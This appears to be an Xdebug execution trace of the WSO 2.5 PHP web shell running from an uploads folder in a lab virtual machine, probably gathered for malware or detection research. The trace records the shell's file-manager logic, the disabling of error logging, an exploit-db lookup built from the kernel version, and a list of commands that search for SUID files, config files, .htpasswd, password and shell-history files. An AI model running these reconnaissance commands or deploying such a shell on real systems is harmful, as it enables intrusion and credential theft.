4		A						/var/www/html/uploads/wso.php	356	$i .= 'r'
4		A						/var/www/html/uploads/wso.php	357	$i .= 'w'
4		A						/var/www/html/uploads/wso.php	358	$i .= '-'
4		A						/var/www/html/uploads/wso.php	359	$i .= 'r'
4		A						/var/www/html/uploads/wso.php	360	$i .= 'w'
4		A						/var/www/html/uploads/wso.php	361	$i .= '-'
4		A						/var/www/html/uploads/wso.php	362	$i .= 'r'
4		A						/var/www/html/uploads/wso.php	363	$i .= '-'
4		A						/var/www/html/uploads/wso.php	364	$i .= '-'
4	152	1	0.009729	898144
4	152	R			'-rw-rw-r--'
3	148	1	0.009743	898168
3	148	R			'<font color=white>-rw-rw-r--</font>'
3	153	0	0.009759	898168	filesize	0		/var/www/html/uploads/wso.php	664	1	'/var/www/html/uploads/wso.php'
3	153	1	0.009772	898208
3	153	R			66134
2		A						/var/www/html/uploads/wso.php	666	$tmp = ['name' => 'wso.php', 'path' => '/var/www/html/uploads/wso.php', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 66134, 'owner' => 'osboxes', 'group' => 'osboxes']
3	154	0	0.009807	897792	is_file	0		/var/www/html/uploads/wso.php	668	1	'/var/www/html/uploads/wso.php'
3	154	1	0.009820	897832
3	154	R			TRUE
3	155	0	0.009833	897736	array_merge	0		/var/www/html/uploads/wso.php	669	2	['name' => 'wso.php', 'path' => '/var/www/html/uploads/wso.php', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 66134, 'owner' => 'osboxes', 'group' => 'osboxes']	['type' => 'file']
3	155	1	0.009856	898176
3	155	R			['name' => 'wso.php', 'path' => '/var/www/html/uploads/wso.php', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 66134, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']
2		A						/var/www/html/uploads/wso.php	669	$files[] = ['name' => 'wso.php', 'path' => '/var/www/html/uploads/wso.php', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 66134, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']
2		A						/var/www/html/uploads/wso.php	657	$i++
2		A						/var/www/html/uploads/wso.php	675	GLOBALS['sort'] = [0 => 'name', 1 => 1]
3	156	0	0.009933	898136	usort	0		/var/www/html/uploads/wso.php	682	2	[0 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 1 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 2 => ['name' => 'wso.php', 'path' => '/var/www/html/uploads/wso.php', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 66134, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']]	'wsoCmp'
4	157	0	0.009970	898584	wsoCmp	1		/var/www/html/uploads/wso.php	682	2	['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file']	['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
5	158	0	0.009998	898584	strtolower	0		/var/www/html/uploads/wso.php	678	1	'.htaccess'
5	158	1	0.010011	898616
5	158	R			'.htaccess'
5	159	0	0.010025	898584	strtolower	0		/var/www/html/uploads/wso.php	678	1	'prepend.php'
5	159	1	0.010038	898616
5	159	R			'prepend.php'
5	160	0	0.010052	898584	strcmp	0		/var/www/html/uploads/wso.php	678	2	'.htaccess'	'prepend.php'
5	160	1	0.010066	898648
5	160	R			-1
4	157	1	0.010080	898584
4	157	R			-1
4	161	0	0.010093	898584	wsoCmp	1		/var/www/html/uploads/wso.php	682	2	['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']	['name' => 'wso.php', 'path' => '/var/www/html/uploads/wso.php', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 66134, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']
5	162	0	0.010121	898584	strtolower	0		/var/www/html/uploads/wso.php	678	1	'prepend.php'
5	162	1	0.010133	898616
5	162	R			'prepend.php'
5	163	0	0.010147	898584	strtolower	0		/var/www/html/uploads/wso.php	678	1	'wso.php'
5	163	1	0.010160	898616
5	163	R			'wso.php'
5	164	0	0.010174	898584	strcmp	0		/var/www/html/uploads/wso.php	678	2	'prepend.php'	'wso.php'
5	164	1	0.010187	898648
5	164	R			-1
4	161	1	0.010200	898584
4	161	R			-1
3	156	1	0.010213	898208
3	156	R			TRUE
3	165	0	0.010226	898160	usort	0		/var/www/html/uploads/wso.php	683	2	[0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']]	'wsoCmp'
4	166	0	0.010254	898608	wsoCmp	1		/var/www/html/uploads/wso.php	683	2	['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']	['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
5	167	0	0.010280	898608	strtolower	0		/var/www/html/uploads/wso.php	678	1	'..'
5	167	1	0.010292	898640
5	167	R			'..'
5	168	0	0.010305	898608	strtolower	0		/var/www/html/uploads/wso.php	678	1	'data'
5	168	1	0.010317	898640
5	168	R			'data'
5	169	0	0.010330	898608	strcmp	0		/var/www/html/uploads/wso.php	678	2	'..'	'data'
5	169	1	0.010342	898672
5	169	R			-3552051
4	166	1	0.010356	898608
4	166	R			-3552051
3	165	1	0.010369	898232
3	165	R			TRUE
3	170	0	0.010382	898160	array_merge	0		/var/www/html/uploads/wso.php	684	2	[0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']]	[0 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 1 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 2 => ['name' => 'wso.php', 'path' => '/var/www/html/uploads/wso.php', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 66134, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']]
3	170	1	0.010428	898600
3	170	R			[0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 2 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 3 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 4 => ['name' => 'wso.php', 'path' => '/var/www/html/uploads/wso.php', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 66134, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']]
2		A						/var/www/html/uploads/wso.php	684	$files = [0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 2 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 3 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 4 => ['name' => 'wso.php', 'path' => '/var/www/html/uploads/wso.php', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 66134, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']]
2		A						/var/www/html/uploads/wso.php	685	$l = 0
3	171	0	0.010529	898240	urlencode	0		/var/www/html/uploads/wso.php	687	1	'..'
3	171	1	0.010542	898304
3	171	R			'..'
3	172	0	0.010557	898368	htmlspecialchars	0		/var/www/html/uploads/wso.php	687	1	'..'
3	172	1	0.010571	898560
3	172	R			'..'
3	173	0	0.010585	898480	urlencode	0		/var/www/html/uploads/wso.php	687	1	'..'
3	173	1	0.010601	898544
3	173	R			'..'
3	174	0	0.010614	898608	urlencode	0		/var/www/html/uploads/wso.php	688	1	'..'
3	174	1	0.010626	898672
3	174	R			'..'
3	175	0	0.010639	898672	urlencode	0		/var/www/html/uploads/wso.php	688	1	'..'
3	175	1	0.010651	898736
3	175	R			'..'
2		A						/var/www/html/uploads/wso.php	689	$l = 1
3	176	0	0.010675	898256	urlencode	0		/var/www/html/uploads/wso.php	687	1	'data'
3	176	1	0.010687	898320
3	176	R			'data'
3	177	0	0.010701	898368	htmlspecialchars	0		/var/www/html/uploads/wso.php	687	1	'data'
3	177	1	0.010714	898560
3	177	R			'data'
3	178	0	0.010728	898480	urlencode	0		/var/www/html/uploads/wso.php	687	1	'data'
3	178	1	0.010740	898544
3	178	R			'data'
3	179	0	0.010753	898608	urlencode	0		/var/www/html/uploads/wso.php	688	1	'data'
3	179	1	0.010765	898672
3	179	R			'data'
3	180	0	0.010778	898672	urlencode	0		/var/www/html/uploads/wso.php	688	1	'data'
3	180	1	0.010790	898736
3	180	R			'data'
2		A						/var/www/html/uploads/wso.php	689	$l = 0
3	181	0	0.010813	898240	urlencode	0		/var/www/html/uploads/wso.php	687	1	'.htaccess'
3	181	1	0.010826	898312
3	181	R			'.htaccess'
3	182	0	0.010840	898288	urlencode	0		/var/www/html/uploads/wso.php	687	1	'.htaccess'
3	182	1	0.010852	898360
3	182	R			'.htaccess'
3	183	0	0.010865	898368	htmlspecialchars	0		/var/www/html/uploads/wso.php	687	1	'.htaccess'
3	183	1	0.010878	898560
3	183	R			'.htaccess'
3	184	0	0.010893	898352	wsoViewSize	1		/var/www/html/uploads/wso.php	687	1	64
3	184	1	0.010906	898384
3	184	R			'64 B'
3	185	0	0.010920	898480	urlencode	0		/var/www/html/uploads/wso.php	687	1	'.htaccess'
3	185	1	0.010932	898552
3	185	R			'.htaccess'
3	186	0	0.010953	898608	urlencode	0		/var/www/html/uploads/wso.php	688	1	'.htaccess'
3	186	1	0.010965	898680
3	186	R			'.htaccess'
3	187	0	0.010978	898672	urlencode	0		/var/www/html/uploads/wso.php	688	1	'.htaccess'
3	187	1	0.010990	898744
3	187	R			'.htaccess'
3	188	0	0.011003	898672	urlencode	0		/var/www/html/uploads/wso.php	688	1	'.htaccess'
3	188	1	0.011015	898744
3	188	R			'.htaccess'
3	189	0	0.011028	898832	urlencode	0		/var/www/html/uploads/wso.php	688	1	'.htaccess'
3	189	1	0.011040	898904
3	189	R			'.htaccess'
2		A						/var/www/html/uploads/wso.php	689	$l = 1
3	190	0	0.011064	898256	urlencode	0		/var/www/html/uploads/wso.php	687	1	'prepend.php'
3	190	1	0.011077	898328
3	190	R			'prepend.php'
3	191	0	0.011091	898320	urlencode	0		/var/www/html/uploads/wso.php	687	1	'prepend.php'
3	191	1	0.011103	898392
3	191	R			'prepend.php'
3	192	0	0.011117	898400	htmlspecialchars	0		/var/www/html/uploads/wso.php	687	1	'prepend.php'
3	192	1	0.011130	898592
3	192	R			'prepend.php'
3	193	0	0.011144	898384	wsoViewSize	1		/var/www/html/uploads/wso.php	687	1	57
3	193	1	0.011157	898416
3	193	R			'57 B'
3	194	0	0.011171	898480	urlencode	0		/var/www/html/uploads/wso.php	687	1	'prepend.php'
3	194	1	0.011184	898552
3	194	R			'prepend.php'
3	195	0	0.011198	898608	urlencode	0		/var/www/html/uploads/wso.php	688	1	'prepend.php'
3	195	1	0.011210	898680
3	195	R			'prepend.php'
3	196	0	0.011223	898672	urlencode	0		/var/www/html/uploads/wso.php	688	1	'prepend.php'
3	196	1	0.011235	898744
3	196	R			'prepend.php'
3	197	0	0.011249	898672	urlencode	0		/var/www/html/uploads/wso.php	688	1	'prepend.php'
3	197	1	0.011261	898744
3	197	R			'prepend.php'
3	198	0	0.011274	898832	urlencode	0		/var/www/html/uploads/wso.php	688	1	'prepend.php'
3	198	1	0.011286	898904
3	198	R			'prepend.php'
2		A						/var/www/html/uploads/wso.php	689	$l = 0
3	199	0	0.011310	898240	urlencode	0		/var/www/html/uploads/wso.php	687	1	'wso.php'
3	199	1	0.011323	898304
3	199	R			'wso.php'
3	200	0	0.011336	898288	urlencode	0		/var/www/html/uploads/wso.php	687	1	'wso.php'
3	200	1	0.011348	898352
3	200	R			'wso.php'
3	201	0	0.011361	898368	htmlspecialchars	0		/var/www/html/uploads/wso.php	687	1	'wso.php'
3	201	1	0.011378	898560
3	201	R			'wso.php'
3	202	0	0.011392	898352	wsoViewSize	1		/var/www/html/uploads/wso.php	687	1	66134
4	203	0	0.011406	898352	sprintf	0		/var/www/html/uploads/wso.php	342	2	'%1.2f'	64.583984375
4	203	1	0.011421	898736
4	203	R			'64.58'
3	202	1	0.011435	898392
3	202	R			'64.58 KB'
3	204	0	0.011449	898480	urlencode	0		/var/www/html/uploads/wso.php	687	1	'wso.php'
3	204	1	0.011462	898544
3	204	R			'wso.php'
3	205	0	0.011475	898608	urlencode	0		/var/www/html/uploads/wso.php	688	1	'wso.php'
3	205	1	0.011487	898672
3	205	R			'wso.php'
3	206	0	0.011501	898672	urlencode	0		/var/www/html/uploads/wso.php	688	1	'wso.php'
3	206	1	0.011512	898736
3	206	R			'wso.php'
3	207	0	0.011525	898672	urlencode	0		/var/www/html/uploads/wso.php	688	1	'wso.php'
3	207	1	0.011537	898736
3	207	R			'wso.php'
3	208	0	0.011550	898832	urlencode	0		/var/www/html/uploads/wso.php	688	1	'wso.php'
3	208	1	0.011561	898896
3	208	R			'wso.php'
2		A						/var/www/html/uploads/wso.php	689	$l = 1
3	209	0	0.011585	898160	htmlspecialchars	0		/var/www/html/uploads/wso.php	693	1	'/var/www/html/uploads/'
3	209	1	0.011598	898352
3	209	R			'/var/www/html/uploads/'
3	210	0	0.011614	898160	class_exists	0		/var/www/html/uploads/wso.php	696	1	'ZipArchive'
3	210	1	0.011628	898200
3	210	R			FALSE
3	211	0	0.011644	898160	wsoFooter	1		/var/www/html/uploads/wso.php	705	0
4	212	0	0.011656	898160	is_writable	0		/var/www/html/uploads/wso.php	286	1	'/var/www/html/uploads/'
4	212	1	0.011671	898200
4	212	R			TRUE
3		A						/var/www/html/uploads/wso.php	286	$is_writable = ' <font color=\'green\'>(Writeable)</font>'
4	213	0	0.011698	898160	htmlspecialchars	0		/var/www/html/uploads/wso.php	291	1	'/var/www/html/uploads/'
4	213	1	0.011711	898352
4	213	R			'/var/www/html/uploads/'
3	211	1	0.011866	898160
2	26	1	0.011877	890968
			0.011911	809440
TRACE END   [2023-02-13 00:35:58.075544]

data/traces/85ce69862572d836cffe0e38f4365c2d_trace-1676262802.8139.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:33:48.711766]
1	0	1	0.000214	393512
1	3	0	0.002949	887296	{main}	1		/var/www/html/uploads/wso.php5	0	0
1		A						/var/www/html/uploads/wso.php5	2	$color = '#df5'
1		A						/var/www/html/uploads/wso.php5	3	$default_action = 'FilesMan'
1		A						/var/www/html/uploads/wso.php5	4	$default_use_ajax = TRUE
1		A						/var/www/html/uploads/wso.php5	5	$default_charset = 'Windows-1251'
1		A						/var/www/html/uploads/wso.php5	13	$userAgents = [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler']
2	4	0	0.003061	887296	implode	0		/var/www/html/uploads/wso.php5	14	2	'|'	[0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler']
2	4	1	0.003083	887440
2	4	R			'Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler'
2	5	0	0.003101	887376	preg_match	0		/var/www/html/uploads/wso.php5	14	2	'/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler/i'	'python-requests/2.25.1'
2	5	1	0.003121	887440
2	5	R			0
2	6	0	0.003135	887296	ini_set	0		/var/www/html/uploads/wso.php5	20	2	'error_log'	NULL
2	6	1	0.003150	887368
2	6	R			''
2	7	0	0.003163	887296	ini_set	0		/var/www/html/uploads/wso.php5	21	2	'log_errors'	0
2	7	1	0.003178	887368
2	7	R			'1'
2	8	0	0.003190	887296	ini_set	0		/var/www/html/uploads/wso.php5	22	2	'max_execution_time'	0
2	8	1	0.003205	887400
2	8	R			'30'
2	9	0	0.003218	887296	set_time_limit	0		/var/www/html/uploads/wso.php5	23	1	0
2	9	1	0.003232	887360
2	9	R			FALSE
2	10	0	0.003245	887328	function_exists	0		/var/www/html/uploads/wso.php5	24	1	'set_magic_quotes_runtime'
2	10	1	0.003258	887368
2	10	R			FALSE
2	11	0	0.003271	887328	define	0		/var/www/html/uploads/wso.php5	27	2	'WSO_VERSION'	'2.5'
2	11	1	0.003284	887432
2	11	R			TRUE
2	12	0	0.003297	887360	get_magic_quotes_gpc	0		/var/www/html/uploads/wso.php5	29	0
2	12	1	0.003309	887360
2	12	R			FALSE
2	13	0	0.003322	887360	substr	0		/var/www/html/uploads/wso.php5	54	3	'Linux'	0	3
2	13	1	0.003336	887488
2	13	R			'Lin'
2	14	0	0.003348	887392	strtolower	0		/var/www/html/uploads/wso.php5	54	1	'Lin'
2	14	1	0.003361	887456
2	14	R			'lin'
1		A						/var/www/html/uploads/wso.php5	57	$os = 'nix'
2	15	0	0.003384	887360	ini_get	0		/var/www/html/uploads/wso.php5	59	1	'safe_mode'
2	15	1	0.003396	887392
2	15	R			FALSE
1		A						/var/www/html/uploads/wso.php5	59	$safe_mode = FALSE
2	16	0	0.003420	887360	error_reporting	0		/var/www/html/uploads/wso.php5	61	1	0
2	16	1	0.003432	887400
2	16	R			22527
2	17	0	0.003445	887360	ini_get	0		/var/www/html/uploads/wso.php5	63	1	'disable_functions'
2	17	1	0.003458	887840
2	17	R			'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
1		A						/var/www/html/uploads/wso.php5	63	$disable_functions = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
2	18	0	0.003504	887808	getcwd	0		/var/www/html/uploads/wso.php5	64	0
2	18	1	0.003517	887856
2	18	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/wso.php5	64	$home_cwd = '/var/www/html/uploads'
2	19	0	0.003542	887856	getcwd	0		/var/www/html/uploads/wso.php5	67	0
2	19	1	0.003554	887904
2	19	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/wso.php5	67	$cwd = '/var/www/html/uploads'
1		A						/var/www/html/uploads/wso.php5	73	$cwd .= '/'
2	20	0	0.003589	887904	md5	0		/var/www/html/uploads/wso.php5	75	1	'localhost'
2	20	1	0.003603	888000
2	20	R			'421aa90e079fa326b6494f812ad13e79'
2	21	0	0.003618	887904	md5	0		/var/www/html/uploads/wso.php5	76	1	'localhost'
2	21	1	0.003630	888000
2	21	R			'421aa90e079fa326b6494f812ad13e79'
1		A						/var/www/html/uploads/wso.php5	76	_COOKIE['421aa90e079fa326b6494f812ad13e79ajax'] = TRUE
1		A						/var/www/html/uploads/wso.php5	92	$aliases = ['List dir' => 'ls -lha', 'list file attributes on a Linux second extended file system' => 'lsattr -va', 'show opened ports' => 'netstat -an | grep -i listen', 'process status' => 'ps aux', 'Find' => '', 'find all suid files' => 'find / -type f -perm -04000 -ls', 'find suid files in current dir' => 'find . -type f -perm -04000 -ls', 'find all sgid files' => 'find / -type f -perm -02000 -ls', 'find sgid files in current dir' => 'find . -type f -perm -02000 -ls', 'find config.inc.php files' => 'find / -type f -name config.inc.php', 'find config* files' => 'find / -type f -name "config*"', 'find config* files in current dir' => 'find . -type f -name "config*"', 'find all writable folders and files' => 'find / -perm -2 -ls', 'find all writable folders and files in current dir' => 'find . -perm -2 -ls', 'find all service.pwd files' => 'find / -type f -name service.pwd', 'find service.pwd files in current dir' => 'find . -type f -name service.pwd', 'find all .htpasswd files' => 'find / -type f -name .htpasswd', 'find .htpasswd files in current dir' => 'find . -type f -name .htpasswd', 'find all .bash_history files' => 'find / -type f -name .bash_history', 'find .bash_history files in current dir' => 'find . -type f -name .bash_history', 'find all .fetchmailrc files' => 'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir' => 'find . -type f -name .fetchmailrc', 'Locate' => '', 'locate httpd.conf files' => 'locate httpd.conf', 'locate vhosts.conf files' => 'locate vhosts.conf', 'locate proftpd.conf files' => 'locate proftpd.conf', 'locate psybnc.conf files' => 'locate psybnc.conf', 'locate my.conf files' => 'locate my.conf', 'locate admin.php files' => 'locate admin.php', 'locate cfg.php files' => 'locate cfg.php', 'locate conf.php files' => 'locate conf.php', 'locate config.dat files' => 'locate config.dat', 'locate config.php files' => 'locate config.php', 'locate config.inc files' => 'locate config.inc', 'locate config.inc.php' => 'locate config.inc.php', 'locate config.default.php files' => 'locate config.default.php', 'locate config* files ' => 'locate config', 'locate .conf files' => 'locate \'.conf\'', 'locate .pwd files' => 'locate \'.pwd\'', 'locate .sql files' => 'locate \'.sql\'', 'locate .htpasswd files' => 'locate \'.htpasswd\'', 'locate .bash_history files' => 'locate \'.bash_history\'', 'locate .mysql_history files' => 'locate \'.mysql_history\'', 'locate .fetchmailrc files' => 'locate \'.fetchmailrc\'', 'locate backup files' => 'locate backup', 'locate dump files' => 'locate dump', 'locate priv files' => 'locate priv']
2	22	0	0.003736	888344	function_exists	0		/var/www/html/uploads/wso.php5	307	1	'posix_getpwuid'
2	22	1	0.003751	888384
2	22	R			TRUE
2	23	0	0.003763	888344	function_exists	0		/var/www/html/uploads/wso.php5	309	1	'posix_getgrgid'
2	23	1	0.003776	888384
2	23	R			TRUE
2	24	0	0.003791	888384	function_exists	0		/var/www/html/uploads/wso.php5	1519	1	'actionFilesMan'
2	24	1	0.003805	888424
2	24	R			TRUE
1		A						/var/www/html/uploads/wso.php5	1520	_POST['a'] = 'FilesMan'
2	25	0	0.003830	888760	function_exists	0		/var/www/html/uploads/wso.php5	1523	1	'actionFilesMan'
2	25	1	0.003844	888800
2	25	R			TRUE
2	26	0	0.003858	888720	actionFilesMan	1		/var/www/html/uploads/wso.php5	1524	0
3	27	0	0.003871	888720	wsoHeader	1		/var/www/html/uploads/wso.php5	636	0
3		A						/var/www/html/uploads/wso.php5	143	_POST['charset'] = 'Windows-1251'
4	28	0	0.003898	890000	htmlspecialchars	0		/var/www/html/uploads/wso.php5	169	1	'/var/www/html/uploads/'
4	28	1	0.003913	890192
4	28	R			'/var/www/html/uploads/'
4	29	0	0.003928	890000	htmlspecialchars	0		/var/www/html/uploads/wso.php5	170	1	'FilesMan'
4	29	1	0.003942	890192
4	29	R			'FilesMan'
4	30	0	0.003955	890000	htmlspecialchars	0		/var/www/html/uploads/wso.php5	171	1	'Windows-1251'
4	30	1	0.003969	890192
4	30	R			'Windows-1251'
4	31	0	0.003984	890000	strpos	0		/var/www/html/uploads/wso.php5	172	2	NULL	'\n'
4	31	1	0.003998	890072
4	31	R			FALSE
4	32	0	0.004011	890000	htmlspecialchars	0		/var/www/html/uploads/wso.php5	172	2	NULL	3
4	32	1	0.004025	890232
4	32	R			''
4	33	0	0.004039	890000	strpos	0		/var/www/html/uploads/wso.php5	173	2	NULL	'\n'
4	33	1	0.004052	890072
4	33	R			FALSE
4	34	0	0.004066	890000	htmlspecialchars	0		/var/www/html/uploads/wso.php5	173	2	NULL	3
4	34	1	0.004079	890232
4	34	R			''
4	35	0	0.004093	890256	strpos	0		/var/www/html/uploads/wso.php5	174	2	NULL	'\n'
4	35	1	0.004106	890328
4	35	R			FALSE
4	36	0	0.004119	890256	htmlspecialchars	0		/var/www/html/uploads/wso.php5	174	2	NULL	3
4	36	1	0.004139	890488
4	36	R			''
4	37	0	0.004181	890768	addslashes	0		/var/www/html/uploads/wso.php5	193	1	'/uploads/wso.php5'
4	37	1	0.004199	890800
4	37	R			'/uploads/wso.php5'
4	38	0	0.004221	888720	diskfreespace	0		/var/www/html/uploads/wso.php5	225	1	'/var/www/html/uploads/'
4	38	1	0.004242	888752
4	38	R			193245057024
3		A						/var/www/html/uploads/wso.php5	225	$freeSpace = 193245057024
4	39	0	0.004269	888720	disk_total_space	0		/var/www/html/uploads/wso.php5	226	1	'/var/www/html/uploads/'
4	39	1	0.004284	888752
4	39	R			232015802368
3		A						/var/www/html/uploads/wso.php5	226	$totalSpace = 232015802368
3		A						/var/www/html/uploads/wso.php5	227	$totalSpace = 232015802368
4	40	0	0.004320	888720	php_uname	0		/var/www/html/uploads/wso.php5	228	1	'r'
4	40	1	0.004335	888800
4	40	R			'5.15.0-60-generic'
3		A						/var/www/html/uploads/wso.php5	228	$release = '5.15.0-60-generic'
4	41	0	0.004360	888768	php_uname	0		/var/www/html/uploads/wso.php5	229	1	's'
4	41	1	0.004373	888832
4	41	R			'Linux'
3		A						/var/www/html/uploads/wso.php5	229	$kernel = 'Linux'
3		A						/var/www/html/uploads/wso.php5	230	$explink = 'http://exploit-db.com/search/?action=search&filter_description='
4	42	0	0.004411	888800	strpos	0		/var/www/html/uploads/wso.php5	231	2	'Linux'	'Linux'
4	42	1	0.004423	888872
4	42	R			0
4	43	0	0.004436	888800	substr	0		/var/www/html/uploads/wso.php5	232	3	'5.15.0-60-generic'	0	6
4	43	1	0.004494	888928
4	43	R			'5.15.0'
4	44	0	0.004514	888848	urlencode	0		/var/www/html/uploads/wso.php5	232	1	'Linux Kernel 5.15.0'
4	44	1	0.005783	888928
4	44	R			'Linux+Kernel+5.15.0'
3		A						/var/www/html/uploads/wso.php5	232	$explink .= 'Linux+Kernel+5.15.0'
4	45	0	0.005820	888912	function_exists	0		/var/www/html/uploads/wso.php5	235	1	'posix_getegid'
4	45	1	0.005837	888952
4	45	R			TRUE
